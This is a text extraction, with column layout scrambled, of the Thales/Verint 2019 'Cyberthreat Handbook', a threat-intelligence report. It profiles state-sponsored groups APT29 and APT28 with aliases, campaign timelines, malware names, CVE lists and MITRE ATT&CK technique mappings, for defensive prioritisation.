Thales Whoswho CyberAttack Pap PDF

The Cyberthreat Handbook
OCTOBRE 2019
Contents _
INTRODUCTION.................................................................................................. p. 4
EXECUTIVE SUMMARY.................................................................................. p. 6
ATTACKERS GROUP........................................................................................p. 12
INDEX......................................................................................................................p 202
REFERENCES....................................................................................................p 208
NOTES.................................................................................................................... p 226
3
Introduction _
T
he cyberthreat landscape is becoming ever This report is the first of its kind in the world in
more complex, and with exponential growth terms of the quality of its content. It is the result
in the volume of threat-related information, of thousands of hours of information gathering,
it is becoming impossible to manage this complexity cross-checking and analysis by our teams of experts,
without efficient tools and methods. How to extract who have conducted an in-depth investigation
the right set of data from this deluge of information? of attackers’ motivations and techniques over a
How to focus on the most relevant pieces of this significant period of time.
giant puzzle? How to see the big picture? These
are crucial questions for organisations and their In order to make the report a real operational tool
cybersecurity stakeholders, from operational teams and not just an inventory of existing cyberthreats, we
managing Intrusion Detection System or Security have not set out to be exhaustive. On the contrary,
Operation Center to strategic decision-makers. we have selected the groups that, in our opinion,
deserve the most attention. To do this objectively,
Cyberthreat technical analysis and the creation we designed an exclusive scoring methodology (see
of meaningful detection signatures are part of the page 8) and established individual ratings cards
answer. This first edition of the Cyberthreat Handbook for each group of attackers.
attempts to explain the value of cyberthreat technical
analysis, and cyberthreat intelligence more broadly, As the report is intended for a broad audience,
by providing insights about some of the most each ratings card reflects a wide variety of data
impactful groups of attackers. ranging from general and historical descriptions to
a mapping of Tactics, Techniques and Procedures
(TTPs).
4 The Cyberthreat Handbook • Thales - Verint

A number of tools is also provided to help users to understand the global cyberthreat landscape on
navigate through the report from various entry points. behalf of our customers and for the benefit of all
cybersecurity stakeholders.
The information in this report is not necessarily
complete. It comes from a wide range of sources When we published our first joint Cyber Threat
and only covers observable behaviours of the groups Landscape exactly one year ago, we explained
of attackers concerned. Opinions on the assumed that it was the first stone of a cyberthreat analysis
origins of the groups of attackers are based on edifice. Today we are continuing to build this edifice
correlations between data sets and strong matches by bringing the world a document that we hope
between the corresponding indices, but they are will establish a baseline in the field of cyberthreat
not based on 100% certainties. analysis.
The collaboration between Thales and Verint on

this document is of enormous value. The two
companies have combined their knowledge and
expertise in order to provide a thorough screening
of the main attacker groups (Advanced Persistent
Threats, criminal elements, hacktivists, terrorists, etc.)
and their assumed countries of origin around the
world. It reflects the commitment of our cyberthreat
intelligence services to monitor, analyse and
Pierre JEANNE Shai ARBEL

Thales Verint
Vice-President Vice-President
Information Systems Security Cyber Threat Intelligence
5
Executive Summary _
P
roduced by Thales and Verint, the their nuisance and/or destruction capacities, explaining its Tactics, Techniques and
Cyberthreat Handbook is an original their difficulty in detection, their agility and Procedures (TTP) according to the matrix
proposal for an environmental their own or higher interest motivations. It developed by MITRE ATT&CK*. By the
analysis of the cyberthreat landscape. This would clearly be illusory to hope to map same token, the objective is to be able
is a dynamic directory which, in its first all known attacker groups, first because to formally identify a group at the time
version, aims to provide a synthetic and they are extremely numerous, and also of an attack by a detailed knowledge of
rigorous analysis of 66 groups of attackers because attack modes are sometimes its habits.
of global importance today. This work in strongly replicated from one group to
T
no way claims to be perfectly exhaustive. another. For example, the IceFog backdoor he Cyberthreat Handbook thus brings
The aim is to provide an introduction to of the Chinese group of the same name together analyses of nearly 490 attack
cyberthreats from open sources that Thales has been widely distributed and used by campaigns conducted in some 40 activity
and Verint consider reliable. other groups of Chinese origin. Effective sectors in 39 countries by 66 attackers of
as this program may be, the simple fact various kinds (49% state-sponsored, 26%
In the form of dedicated ratings cards, the of using it is not enough to justify the hacktivist, 20% cybercriminals and 5%
report sets out to familiarise the reader inclusion of all the groups that might be terrorists). Most often, state-sponsored
with groups of different profiles. There in a position to use it. By its very nature, groups focus on stealing sensitive data
are cyber-attackers sponsored by Nation the cyber threat landscape also a highly from geopolitical targets of interest and/or
States, high-flying cyber-criminal groups, complex matter to study, with many cyber critical infrastructure providers, generally
hacktivist groups and cyber-terrorists. This attackers operating in the shadows, with using backdoor techniques. Hacktivists
panorama shows that the threat is extremely a clear desire to conceal themselves. pursue ideological motivations (community,
diversified, both technically, with varied modus
religious, political, etc.), denouncing facts
operandis, and in terms of performance, The attacker groups profiled in this report
deemed unacceptable by conducting
some of them demonstrating an extremely all have one thing in common: they are
DDoS attacks, proselytising or spreading
high level of technical sophistication such all significant attackers, in terms of the
disinformation through defacement. What
as the ATK91 group (Xenotime, Triton, number of campaigns conducted, the
we call cybercriminals are groups seeking
TEMP.Veles) capable of infiltrating and technical competence they demonstrate,
substantial financial gains, for example
manipulating critical infrastructure and the agility of their operating methods and
through the use of ransomware. Finally,
industrial control and security systems the strength of their motivations. In a
cyber-terrorists either have a proselytising
(ICS) with its Triton malware. word, they are all determined opponents,
approach, in order to find new adepts,
capable of carrying out significant attacks.
Several criteria have been used to define or seek to destroy data, with the use of
Their level of "performance" is variable, as
what we call the importance of these wipers for example, or infrastructures,
indicated by the scoring system we have
threats. Some groups will be considered with defacement and the use of publicly
established for the purposes of this report.
relevant because of their recent nature available pentest tools.
For each of these attackers, we provide a
and performance. In this respect, ATK120 brief description. We detail their names in Analysis of this broad range of attackers
(Lyceum/Hexane), discovered at the end the various known sources, their nature makes it possible to reconstitute the
of August 2019, makes a sensational (state-sponsored, criminal, hacktivist or idiosyncrasies of certain types of groups.
entry into the cyberthreat landscape and terrorist), their known targets in terms of The most virulent and well-trained attacker
has been integrated into this work in this sectors of activity and geographical areas, groups do not necessarily develop their
regard. Others have not been active for the language they use and their assumed own malware, for instance. Most use
several years, but their status as Advanced origin, motivations and objectives. We malware developed by others, who make it
Persistent Threats (APT), characteristic of also contextualise the activity of some a specialty. Some design digital weapons,
state-sponsored groups and their past groups in light of international events that others use them as part of a well-structured
campaigns, leads us to consider them as may have occurred during their attack offensive strategy. Groups of Chinese
still part of the same landscape. Nor can campaigns. These same campaigns origin, for example, have thus developed
the ATK2 group (APT17), for example, are also detailed and illustrated in a a habit of sharing their most successful
whose campaigns seem to have weakened timeline for each of the ratings cards in malware with other groups. The other
in intensity since 2014, be ignored since order to trace known activity. Each card growing trend is the purchase of botnet
during its last campaign it managed to also explains the malware used, whether malware on the Dark Web from the highest
compromise the websites of the GIFAS, the specific to the attacker group or used by bidder to distribute much more developed
French aerospace industry association, and others, the legitimate tools used and the malware in a second phase.
the systems of some of its members. More vulnerabilities exploited. Finally, we dissect
generally, groups are chosen because of the attacker's usual modus operandi by *https://attack.mitre.org/

Idiosyncrasy is also sometimes a matter components integrated into the company's In general, this "top 5" tells us that systems
of geography. Not all attacker groups use systems (mobile applications, code lines, in critical sectors are clearly the most
the same attack techniques according to software suppliers, etc.) or connected targeted, and that "cyber Pearl Harbor"
their geographical origin. For example, objects such as surveillance cameras. scenarios involving future smart cities and
very few Chinese cyber-criminal groups use Another emerging trend is the increasingly their key infrastructures, for example, are
ransomware, preferring crypto-mining for widespread use of certificate malware highly likely. In addition, there are also
the vast majority of their attacks. Middle signatures, whereby hackers sign their increasing attacks on the health sector
Eastern cyber pirates favour the fraudulent malware with stolen legitimate certificates for the theft of targeted personal data
use of social networks, encrypted messaging so as not to arouse the suspicions of many or information on highly sensitive and
(WhatsApp, Telegram, etc.) or develop antivirus programs. valuable pharmaceutical products. In
malware dedicated to mobile applications the era of informational crisis, the media
(especially running on Android). The We also note that some techniques remain sector is also increasingly being targeted.
North Korean groups — each of which widely used because they are tremendously Most often they are watering hole attacks
specialises in monitoring a specific subject effective. Most often their success is based consisting in imitating an official website
(espionage of the defence sector in the US on the exploitation of human carelessness to disseminate false information or more
and Europe / espionage of South Korea and error. Spear-phishing, although as sophisticated Strategic Web Compromise
/ financial crime) — are now pooling old as cyber itself, thus continues to be (SWC) attacks consisting in compromising
their attack infrastructures. This strategy effective and widely used. an official website for the same reasons.
makes it very complex to attribute certain
The main sectors of activity targeted also
T
attacks to a particular group and leads he Cyberthreat Handbook also proposes
most observers to amalgamate them tell us a lot about the typical profiles that
emerge from the analysis. More than half of to offer a new and accurate vision of
under the generic name of Lazarus. the cyberthreat landscape by establishing
These "geographical" specificities can be the groups target government institutions,
often defence organisations, followed by the a scoring by attacker based on the MITRE
explained, as in the case of North Korea ATT&CK matrix. The purpose is to illustrate
or China, by the fact that these attacker financial, transport, energy and aerospace
sectors. It is not surprising that the most the level of threat represented by each.
groups communicate with each other and This is the second main purpose of this
share attack techniques, often because competent and motivated opponents are
primarily targeting states, their defence report: to provide a quantified estimate of
they are sponsored by the same state the level of threat posed by attackers. By
entities. They are also sometimes based capabilities and all the major players in
this sector. These attackers, most of whom knowing their usual tactics, we can establish
on technical limitations (for example, the whether the potential for nuisance and/
relative unavailability of the Play Store in are themselves state-sponsored, carry out
targeted attacks on geopolitical rivals or or destruction is more or less important
the Middle East), which directs attackers with regard to their techniques (whether
towards certain modus operandis rather their strategic operators. Finance is the
second sector most affected by attacking these techniques are more or less easy
than others. However, this geographical to implement, whether they allow the
characterisation of attackers through groups. Essentially cyber-criminals, these
profiles are driven by a quest for significant attacker to control all of part of a system,
the tools used is not systematic. Russian whether attackers focus on a limited range
attackers, whose motivations are varied, financial gain. Their offensives are therefore
global and target all players in the global of techniques or an elaborate arsenal,
use the full cyber arsenal at their disposal, and whether they can change techniques
for example. financial system. To our knowledge, 137
different geographical areas have been regularly and demonstrate a high degree of
targeted by attacker groups in this sector. agility). All these indications are objective
This broad analysis also makes it possible
The same applies to attacks against major parameters that allow us to build an
to identify trends in technical behaviour.
energy players, most often multinationals, indicative score for each attacker.
In the context of supply chain attacks,
for example, as the global defences of with 24 attackers affecting 106 countries,.
organisations are strengthened, attackers The energy sector has also been the
are forced to put in place more elaborate subject of very diversified attacks, with
tactics to circumvent them. These attacks our analysts identifying more than 230
therefore remain very effective and there different malware families in use cases.
is a large increase in indirect attacks, This is probably due to the increasing
passing through the suppliers of the number of compromises on proto-IoT
various organisations. These are then used or SCADA systems, on which attacks are
as trojans. They may be the company's also developing in the transport sector.
usual service providers to target computer
7
Executive Summary _
T he MITRE ATT&CK matrix defines

12 tactics that can be used by an
attacker to carry out its campaigns. Each
It is on this model that the Thales/Verint
scoring of attackers has been built. For
some attackers, the score is not indicated
as low or even zero, it doesn’t necessarily
reflects its true technical level. The latter
can be important but unknown, which
of these 12 tactics encompasses 9 to 68 because their techniques are not known. reinforces the threat generated. The score
techniques identified by the MITRE matrix. Thus, if an attacker's score is presented is extracted from the following formula:
Example of profiling an attacker group
The 12 tactics of
the Mitre
Example of
a technique used
by the attacker
group considered
among the
68 techniques
of the Mitre.
On this example the attacker group uses 11 tactics among the 12 of the Mitre and 44 techniques.

T he value of the report is that users
can focus their attention on the most
relevant threats. The dynamic nature of the
the business and/or the country in which
each organisation operates. Indeed, the
overarching objective of this report is to
directory and its rating system therefore help prioritise action by creating intelligence
helps to prioritise efforts according to from information.
9
Executive Summary _
ATT&CK MITRE Matrix*

Initial Access Privilege Escalation Credential Access
Opponents try to enter your network. Opponents try to get higher-level Opponents try to steal account names
Initial access consists of techniques that use permissions. and passwords.
various input vectors to take their initial place Privilege escalation consists of techniques Access to credentials consists of identity
within a network. Techniques used to gain that opponents use to obtain higher-level theft techniques focused on account
a foothold include targeted spear-phishing permissions on a system or network. names and passwords. Techniques used to
and exploiting weaknesses on publicly Opponents can often enter and explore obtain proof of identity include keystroke
accessible web servers. Getting started a network with non-privileged access, but registration or the elimination of proof of
with initial access may allow continuous they need high permissions to achieve their identity. The use of legitimate credentials
access, such as valid accounts and the objectives. Common approaches include can allow opponents to access systems,
use of external remote services or may taking advantage of system weaknesses, make them more difficult to detect and
be limited due to changing passwords. configuration errors and vulnerabilities. give them the opportunity to create more
Examples of elevated access are as follows: accounts to help them achieve their
Execution SYSTEM/root level objectives.
Opponents try to execute malicious Local administrator
code. Discovery
User account with administrator access
Execution consists of techniques that allow Opponents try to understand your
User accounts with access to a specific environment.
you to execute code controlled by your
system or performing a specific function
opponent on a local or remote system. Discovery consists of techniques that an
Techniques that execute malicious code These techniques often overlap with opponent can use to acquire knowledge
are often combined with techniques persistence techniques, as operating system about the system and the internal network.
from all other tactics to achieve broader characteristics that allow an opponent to These techniques help opponents to observe
objectives, such as network exploration persist can be performed in a high context. the environment and orient themselves
or data theft. For example, an opponent before deciding how to act. They also
may use a remote access tool to execute a Defence Evasion allow opponents to explore what they can
PowerShell script that performs the remote Opponents try to avoid being detected. control and what is around their entry point
system search. to discover how this could benefit their
Defence evasion consists of techniques that current objective. Native operating syst
opponents use to avoid being detected
Persistence system tools are often used to achieve this
throughout their compromise. Techniques post-compromise information collection
Opponents try to maintain their hold. used to evade defence include uninstalling/ objective.
Persistence consists of techniques that disabling security software or obscuring/
opponents use to maintain access to systems encrypting data and scripts. Opponents
during restarts, changes in credentials and
Lateral Movement
also exploit and abuse trusted processes
other interruptions that could disable access. to conceal their presence and hide their Opponents try to move in your
Techniques used for persistence include malware. The techniques of other tactics environment.
any access, action or configuration change are interspersed here when these techniques Lateral movement consists of techniques
that allows them to maintain control over have the additional advantage of subverting that opponents use to enter and control
systems, such as replacing or diverting defences. remote systems on a network. To achieve
legitimate code or adding boot code. their primary objective, they often need to
explore the network to find their target and
then access it. To achieve their objective,
*https://attack.mitre.org/

it is often necessary to go through multiple network. Once they have collected the
systems and accounts to take advantage data, opponents often pack it up to avoid
of them. Opponents can install their own detection while deleting it. This may include
remote access tools to perform lateral compression and encryption. Techniques
movements or use legitimate identifiers for obtaining data from a target network
with native network and operating system generally include transferring data to a
tools, which can be stealthier. command and control channel or another
channel and may also include imposing
Collection size limits on the transmission.
Opponents try to collect data of
interest for their objectives. Impact
Collection consists of techniques that Opponents try to manipulate, interrupt
opponents can use to gather information or destroy your systems and data.
and the sources from which the information Impact consists of techniques that opponents
is collected are relevant to achieving their use to disrupt availability or compromise
objectives. Often, the next objective after integrity by manipulating operational
data collection is to steal (extract) the data. processes. Techniques used for impact may
Common target sources include various include the destruction or falsification of
types of readers, browsers, audio, video data. In some cases, business processes
and e-mail tools. Common collection may seem perfect, but they may have
methods include screen capture and been modified to meet the opponent's
keyboard entry. objectives. These techniques can be used
by opponents to achieve their final objective
Command and Control or to cover up a breach of confidentiality.
Opponents try to communicate with
compromised systems to control them.
Command and control are techniques that
adversaries can use to communicate with
the systems under their control within a
network of victims. Opponents generally
try to imitate normal and expected traffic to
avoid detection. There are many ways for
an adversary to establish command and
control with different levels of discretion
depending on the structure of the network
and the victim's defences.
Exfiltration
Opponents try to steal data.
Exfiltration consists of techniques that
opponents can use to steal data from your
11
Attackers Group _

13
Alias _ Threat Actor _ Targeted Sectors _ Motivations
91
APT 29 Cyber Criminal Defense & Objectives _
ATK7
COZER Cyber Terrorist Government Agencies Cyber Espionage
COZY BEAR I nternational Data Theft
COZY DUKE Hacktivist
COZY CAR Organizations
DUKES State Sponsored
EUROAPT
GROUP 100 Unknown
HAMMER TOSS
MINIDIONIS Language
OFFICE MONKEYS Russian
SEA DUKE
THE DUKES
YTTRIUM
Assumed origin of the attacker
DESCRIPTION CAMPAIGNS
ATK7 is an attacker group that exists since way: Their campaigns are not designed in 2008 - Campaign against Chechnya
at least 2008 and that is believed to act order to be discrete, but to be distributed The first campaign attributed to APT29 was
for the Russian government. The group is to many victims, followed by deployment the two PinchDuke attacks in November
composed of highly competent members of a malware that will quickly grab and 2008. These attacks were associated with
that are well organized, allowing for exfiltrate every potentially interesting fake Turkish websites, the first one mimicking
complex and long-running campaigns. information. When a victim of interest has the “Chechan [sic] Informational Center”,
The group's main goal is espionage and been unmasked, the group will then often the other claiming to provide “news from
intelligence collection. The group therefore switch to a different, stealthier malware, the jihad world” with a section dedicated
targets Western organizations, with a designed for long-term persistence, in to Chechnya.
special focus on governmental bodies, order to gather intelligence.
think tanks… It has also occasionally In recent years, the group has been leading 2009- Campaign against West
expanded its reach to governments in the these campaigns bi-annually. countries
Middle East, Asia, Africa, etc. In order to During 2009 the Dukes targeted
The group is suspected to be responsible
reach its goal, the group has used multiple organizations such as the Ministry of
for the 2015 hack of multiple governmental
families of malware. Defense of Georgia and the ministries
institutions in the USA, including the White
The group aims to act fast, albeit in a noisy House, the Pentagon and the DoS. of foreign affairs of Turkey and Uganda,
U.S.-based foreign policy think tank,
organizations linked to a NATO exercise
in Europe, the Georgian “Information
Centre on NATO”, government institutions
in Poland and the Czech Republic. They
seem to be interested in political matters
TOOLS, MALWARES AND VULNERABILITIES related to the United States, the North
Atlantic Treaty Organization and by
Malwares Legitimate software Exploited vulnerabilities gathering information on the Georgia-
CloudDuke None CVE-2010-0232 NATO relations. It is worth noting that the
CosmicDuke attacks on the US-based think tank, as
CozyDuke well as government institutions in Poland
GeminiDuke and the Czech Republic began few days
HammerDuke after Barack Obama, the US President,
MiniDuke spoke about missile defenses deployment.
OnionDuke
2010 - Campaign in the Caucasus
PinchDuke
SeaDuke The spring of 2010 saw continued PinchDuke
campaigns against Turkey and Georgia,
but also numerous campaigns against
other members of the Commonwealth of
Independent States such as Kazakhstan,
Kyrgyzstan, Azerbaijan and Uzbekistan.
Dukes arsenal expansion campaign in 2011
By 2011, the Dukes had already developed
at least 3 distinct malware toolsets, including
a plethora of supporting components such
as loaders and persistence modules. In
fact, as a sign of their arsenal’s breadth,
they had already decided to retire one
of these malware toolsets as obsolete
after developing a replacement for it,
seemingly from scratch.

Targeted Countries _
Azerbaijan Poland
Belgium Portugal
Chechnya Romania
Czech Republic Spain
Georgia Turkey
Hungary United States
Ireland Uganda
Kazakhstan Ukraine
Kyrgyzstan Uzbekistan
Luxembourg
Russia
2013 - Campaign against European and more targeted operations using the 2008
countries CosmicDuke malware. The CosmicDuke

Nov-2008
During the MiniDuke campaign, ATK7 campaign are described by the Polish security
Campaign against
used spear-phishing with malicious PDF company Prevenity, explaining that these two Chechnya Jan-2009
campaigns targeted Polish entities through 2009
attachments to spread its malware. They Campaign against
West countries
used lure documents about political subjects spearphishing email containing malicious
suchs as “Ukraine’s NATO Membership lure document named in Polish language.
Action Plan (MAP) Debates”, “The Informal Another campaign targeted Georgian Jan-2010
Asia-Europe Meeting (ASEM) Seminar on organizations with a lure document named 2010 Campaign in the
Caucasus
Human Rights”, and “Ukraine’s Search for “NATO consolidates control of the Black
a Regional Foreign Policy”. The Kapersky Sea.docx” (in translated from Geogian).
Jan-2011
identified high-profile victims from Ukraine, 2015 - Campaign against the USA 2011 Dukes arsenal
Belgium, Portugal, Romania, the Czech expansion
Starting from July 7, 2015, the group campaign
Republic, Ireland, the United States and
targeted governmental institutions in the
Hungary by examining command and
USA, including the White House, the
control log files.
Pentagon and the DoS. The group used 2012
2013 - Campaign against trade of the Seaduke malware for this.

illegal substances 2018 - Campaign
In September 2013 a CosmicDuke campaign Jan-2013 Jan-2013
After a long period of absence, a phishing
was observed targeting Russian speakers 2013 Campaign against Campaign against
campaign associated with APT29 made European countries trade of illegal
involved in the trade of illegal and controlled substances
surface in 2018. This campaign, targeting
substances.
think tanks, law enforcement agencies, Jan-2014
Jan-2014
2014 - Campaign with large-scale defense companies and governmental
2014
Campaign with
Campaign with
large-scale
spreading of CozyDuke agencies used a fake document pretending spreading of
OnionDuke botnet
CozyDuke had been under development to be from the US Department of State. CozyDuke
since at least the end of 2011, it was not The group compromised the website of Jan-2015
Jan-2015 Jan-2015
Jan-2015
until the early days of July 2014 that the a hospital and a consulting company in 2015
Campaign with
CozyDuke
Campaign Campaign
Campaign with
against Poland agaisnt the
first large-scale CozyDuke campaign that order to send their messages. For this SeaDuke and CloudDuke
and Georgia USA
HammerDuke
we are aware of took place. campaign, the group used the CobaltStrike
Beacon malware, using malicious Windows
2014 - Campaign with OnionDuke Shortcuts. 2016
botnet
The purpose of the OnionDuke variant
spread via the Tor node was not to pursue
targeted attacks but instead to form a 2017
small botnet for later use.
2015 - Campaign with CloudDuke
In July 2015, ATK7 conducted a large-scale Jan-2018
2018
phshing campaign using CloudDuke, a Campaign
new malware. This campaign appears to

consists of two waves of spear-phishing
emails one à the beginning and the other
2019
at the end of July.
2015 - Campaign against Poland
and Georgia
During the CozyDukes and CloudDuke
campaigns, ATK7 conducted stealthier
15
91
APT 29 Cyber Criminal Defense & Objectives _
ATK7
COZER Cyber Terrorist Government Agencies Cyber Espionage
COZY BEAR I nternational Data Theft
COZY DUKE Hacktivist
COZY CAR Organizations
DUKES State Sponsored
EUROAPT
GROUP 100 Unknown
HAMMER TOSS
MINIDIONIS Language
OFFICE MONKEYS Russian
SEA DUKE
THE DUKES
YTTRIUM
MODUS OPERANDI (ATT&CK FRAMEWORK)

Azerbaijan Poland
Belgium Portugal
Chechnya Romania
Czech Republic Spain
Georgia Turkey
Hungary United States
Ireland Uganda
Kazakhstan Ukraine
Kyrgyzstan Uzbekistan
Luxembourg
Russia
Initial Access T1070 - Indicator Removal on Host Collection

T1078 - Valid Accounts T1078 - Valid Accounts T1005 - Data from Local System
T1192 - Spearphishing Link T1085 - Rundll32 T1025 - Data from Removable Media
T1193 - Spearphishing Attachment T1088 - Bypass User Account Control T1039 - Data from Network Shared Drive
Execution T1093 - Process Hollowing T1056 - Input Capture
T1096 - NTFS File Attributes T1113 - Screen Capture
T1028 - Windows Remote Management
T1099 - Timestomp T1114 - Email Collection
T1035 - Service Execution
T1102 - Web Service T1115 - Clipboard Data
T1047 - W i n d o w s M a n a g e m e n t
T1107 - File Deletion T1185 - Man in the Browser
Instrumentation
T1116 - Code Signing Command and Control
T1053 - Scheduled Task
T1134 - Access Token Manipulation
T1059 - Command-Line Interface T1001 - Data Obfuscation
T1197 - BITS Jobs
T1064 - Scripting T1008 - Fallback Channels
T1207 - DCShadow
T1085 - Rundll32 T1024 - Custom Cryptographic Protocol
T1497 - Virtualization/Sandbox Evasion
T1086 - PowerShell T1026 - Multiband Communication
T1106 - Execution through API Credential Access T1032 - Standard Cryptographic Protocol
T1203 - Exploitation for Client Execution T1003 - Credential Dumping T1043 - Commonly Used Port
T1204 - User Execution T1056 - Input Capture T1071 - Standard Application Layer
Persistence T1081 - Credentials in Files Protocol
T1098 - Account Manipulation T1079 - Multilayer Encryption
T1015 - Accessibility Features
T1145 - Private Keys T1090 - Connection Proxy
T1023 - Shortcut Modification
T1050 - New Service Discovery T1094 - Custom Command and Control
T1007 - System Service Discovery Protocol
T1010 - Application Window Discovery T1095 - Standard Non-Application Layer
T1060 - Registry Run Keys / Startup Folder
Protocol
T1078 - Valid Accounts T1016 - System Network Configuration
Discovery T1102 - Web Service
T1018 - Remote System Discovery T1105 - Remote File Copy
Instrumentation Event Subscription
T1033 - System Owner/User Discovery T1132 - Data Encoding
T1098 - Account Manipulation
T1046 - Network Service Scanning T1172 - Domain Fronting
T1101 - Security Support Provider
T1057 - Process Discovery T1188 - Multi-hop Proxy
T1197 - BITS Jobs
T1063 - Security Software Discovery T1483 - Domain Generation Algorithms
Privilege Escalation
T1082 - System Information Discovery Exfiltration
T1015 - Accessibility Features
T1083 - File and Directory Discovery T1002 - Data Compressed
T1050 - New Service
T1087 - Account Discovery T1020 - Automated Exfiltration
T1124 - System Time Discovery T1029 - Scheduled Transfer
T1055 - Process Injection
T1135 - Network Share Discovery T1030 - Data Transfer Size Limits
T1068 - Exploitation for Privilege Escalation
T1497 - Virtualization/Sandbox Evasion T1048 - E xfiltration Over Alternative
T1078 - Valid Accounts
Lateral Movement Protocol
T1088 - Bypass User Account Control
T1134 - Access Token Manipulation T1021 - Remote Services Impact
T1178 - SID-History Injection T1028 - Windows Remote Management T1485 - Data Destruction
Defense Evasion T1075 - Pass the Hash
T1076 - Remote Desktop Protocol
T1027 - Obfuscated Files or Information
T1077 - Windows Admin Shares
T1036 - Masquerading
T1097 - Pass the Ticket
T1045 - Software Packing
T1105 - Remote File Copy
T1175 - Distributed Component Object
T1064 - Scripting
Model
T1066 - Indicator Removal from Tools
17
APT 28 Cyber Criminal Aerospace & Objectives _
80 ATK5
FANCY BEAR Cyber Terrorist Cybersecurity Espionage
GROUP 74 Defence Political Manipulation
GROUP-4127 Hacktivist
IRON TWILIGHT Embassies
PAWN STORM State Sponsored
SNAKEMACKEREL Government Agencies
STRONTIUM Unknown
Language
SEDNIT Hospitality
English
SOFACY I nternational Russian
SWALLOWTAIL
TAG_0700 Organizations Georgian
TG-4127 Media
TSAR TEAM
DESCRIPTION
ATK5 is a Russian state-sponsored group or citizens, geopolitics. They also have been implicated
of attackers operating since 2004 if not Eastern European governments, in the U.S. presidential election attacks
earlier, whose main objective is to steal in late 2016.
Security organisations.
confidential information from specific targets The 2016 attacks were visible and disruptive
such as political and military targets that The attack of the Georgian Ministry of
but in 2017 the group operates a great
benefit the Russian government. It is a Defense can be a response to the growing
change to more stealthy attacks to gather
skilled team which has the capabilities to U.S.-Georgian military relationship. In
intelligence about a range of targets.
develop complex modular malwares and 2013, the group targeted a journalist
which is a way to monitor public opinion, One of the striking characteristics of ATK5
exploit multiple 0-days. Their malwares are
spread disinformation or identify dissident. is its ability to come up with brand-new
compiled with Russian language setting and
0-day vulnerabilities regularly. In 2015,
during the Russian office working hours. During 2015 and 2016, this group’s activity
the group exploited no fewer than six
Despite number of public disclosures from has increased significantly, with numerous
0-day vulnerabilities. This high number
European governments and indictments attacks against government departments
of 0-day exploits suggests significant
from the U.S. Department of Justice, this and embassies all over the world.
resources available, either because the
adversary continues to launch operation Among their most notable presumed targets group members have the skills and time to
targeting the political and defence sector are the American Democratic National find and weaponize these vulnerabilities, or
in Europe and Eurasia. Committee, the German parliament and because they have the budget to purchase
Between 2007 and 2014, ATK5 had three the French television network TV5Monde. the exploits. In addition, ATK5 tries to
kind of targets: ATK5 seems to have a special interest in profile its target system to deploy only the
Georgian government agencies (Ministry Eastern Europe, where it regularly targets needed tools. This prevents researchers
of Internal Affairs and Ministry of Defence) individuals and organizations involved in from having access to their full arsenal.
TOOLS, MALWARES AND VULNERABILITIES

Malwares Legitimate software Exploited vulnerabilities
BADVSTORESHELL LoJax Certutil CVE-2017-0144 CVE-2013-3897
Cannon OLDBAIT Forfiles CVE-2014-1776 CVE-2015-3043
CORESHELL USBStealer Koadic CVE-2014-1761 CVE-2015-2424
DealersChoice X-Agent Mimikatz CVE-2012-0158 CVE-2015-1642
Downdelph XAgentOSX Responder CVE-2015-5119 CVE-2015-2590
HIDEDRV X-Agent for Android Winexe CVE-2013-3906 CVE-2015-1701
JHUHUGIT XTunnel CVE-2015-7645 CVE-2015-4902
Komplex Zebrocy CVE-2015-2387 CVE-2017-0262
CVE-2010-3333 CVE-2017-0263
CVE-2015-1641 CVE-2014-4076
CVE-2013-1347 CVE-2014-0515
2008 2009 2010 2011 2012 2013 2014
Jan-2008 Jan-2011 Oct-2011 Jan-2013 Jul-2013 Jan-2014

APT28 use lure • Spearphi
Cyber-attacks Spearphishing Targeting the Targeting
written in Georgian on Pakist
accompanying on the French Georgian Ministry an Eastern
military o
Georgian invasion Defense Ministry of Internal Affairs European
Ministry of • APT28 us
Foreign Affairs Android
Jan-2008 Jan-2012 X-Agent t
Compromise of the Spearphishing track Ukr
US Department of on the Vatican Sep-2013 artillery
Defense network embassy in Iraq Spearphi
Spearphishing on
on Pakist
Military officials
military o

Afghanistan Japan Spain
Armenia Kazakhstan Sweden
Belarus Latvia Switzerland
Belgium Malaysia Tajikistan
Brazil Mongolia Turkey
Bulgaria Montenegro Ukraine
Canada Netherland United
China Poland Kingdom
France Romania United
Georgia Slovakia States
Germany South
Hungary America
Iran South Korea
Russia
CAMPAIGNS
2008 - Compromise of the US Department 2014 - 2016 - APT28 uses Android X-Agent August 2015 - APT28 targets Russian
of Defense network to track Ukrainian artillery rockers and dissidents Pussy Riot
2008 - Cyber-attacks accompanying Georgian Operators of the Ukrainian artillery D-30 used APT28 targets Russian rockers and dissidents
invasion an Android application to simply target. This Pussy Riot via spear-phishing emails.
application was compromised using an Android
2011 - APT28 use lure written in Georgian version of X-Agent. The malware does not interfere March 2016 - APT28 targets Hillary Clinton
with the function of the application, but it was Presidential Campaign
October 2011 - Spearphishing of the French In March 2016, APT28 launched a spearphishing
Defense Ministry able to gather intelligence about the team, their
hierarchy and get an approximative position. campaign using Bitly accounts to shorten malicious
January 2012 - Spearphishing on the Vatican URLs. The targets were similar to previous
embassy in Iraq February - April 2015 - APT28 compromised campaigns but also included email accounts
TV5Monde linked to the November 2016 United States
Mid-2013 - Targeting the Georgian Ministry On April 8, 2015 at 8:50 p.m. CET, TV5 Monde's presidential election such as people managing
of Internal Affairs broadcasting infrastructure was the target of a Hillary Clinton's communications, travel, campaign
September 2013 - Spearphishing on Military cyber-attack. The channel's Twitter and Facebook finance, etc.
officials accounts were also hacked. Messages of support
for the Islamic State in English, Arabic and French April - May 2016 - APT28 targets the
Late-2013 - Targeting a Journalist Covering are published, as well as documents presented Germany’s Christian Democratic Union
the Caucasus as identity documents and CVs of relatives of May 2016 - Spear-phishing attack against
Late-2013 - Targeting an Eastern European French military personnel involved in operations a U.S. government entity
Ministry of Foreign Affairs against EI. In June, the media revealed that the On May 2016, APT28 sent e spear-phishing
investigation was moving away from the jihadist email to a U.S. government entity using an email
January 2014 - Spearphishing on Pakistani trail, seen as a decoy, and towards that of APT28.
military officials address belonging to the Ministry of Foreign
The cyber-attack has similarities to the group's Affairs of another country.
August 2014 - Attempt to compromise the modus operandi, use common servers and the
Polish government source code would have been typed on a Cyrillic Spring 2016 - APT28 attacks the U.S.
APT28 used a lure about hostilities surrounding keyboard at times corresponding to office hours Democratic National Committee
a Malaysia Airlines flight downed in Ukraine in in St Petersburg and Moscow.
Summer 2016 - APT28 attacks the World
a probable attempt to compromise the Polish April 2015 - Operation RussianDoll Anti-Doping Agency (WADA)
government. The target firm is an “international government November 2016 - APT28 targets the
September2014 - Typosquatting ofEuropean entity” in an industry which APT28 is known Organization for Security and Co-operation
defense exhibition to have targeted in the past, said FireEye. The in Europe (OSCE)
